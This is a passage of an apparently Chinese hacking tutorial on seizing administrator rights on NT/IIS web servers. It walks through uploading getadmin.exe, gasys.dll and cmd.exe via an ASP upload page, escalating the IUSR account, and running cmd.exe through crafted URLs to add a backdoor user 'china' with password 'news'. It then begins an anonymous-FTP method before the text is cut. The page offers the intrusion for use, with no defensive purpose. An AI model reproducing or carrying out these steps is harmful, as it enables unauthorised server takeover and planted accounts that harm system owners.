+设为首页 +添加到收藏夹
1. 如果你有nt/iis服务器的任何一个帐号,哪怕是guest帐号,都可以获得administrator权限;
2. 用netcat与iishack可以获得administrator; 【程序编程相关:x-scan扫描中---Nessus攻击】 【推荐阅读:“漏洞攻击程序”是这样编译出来的】 3. iusr_计算机名这个帐号有ftp上传.web执行等权限; 【扩展信息:黑客扫描特征及易受攻击的端口】 4. 在web server上执行程序是入侵nt的关键; 5. 要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去. 在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts与cgi-bin目录,scripts目录下有uploadn.asp等asp程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号.第一个方法:用iusr_ntsvr2或者guest这两个帐号(这里假设我们已经破解了这个帐号的密码),在浏览器输入:
http://www.xxx.com/scripts/uploadn.asp guest与iusr_ntsvr2这两个帐号都可以进这个asp页面. 在这里把文件getadmin与gasys.dll以及cmd.exe上传到/scripts目录,然后输入: http://www.xxx.com/scripts/getadmin.exe?iusr_ntsvr2 大约十多秒后屏幕显示: cgi error 这时有90%的可能是你已经把iusr_ntsvr2升级为administrator,也就是任何访问该web站的人都是管理员. 下面可以add user: http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/scripts/getadmin.exe?china 第二个方法:用匿名ftp 如果允许匿名帐号ftp登陆的设定,也给我们带来了突破nt server的机会.我们用ftp登陆一个nt server,比如:www.xxx.com(示例名): c:\> ftp www.xxx.com ... 下一页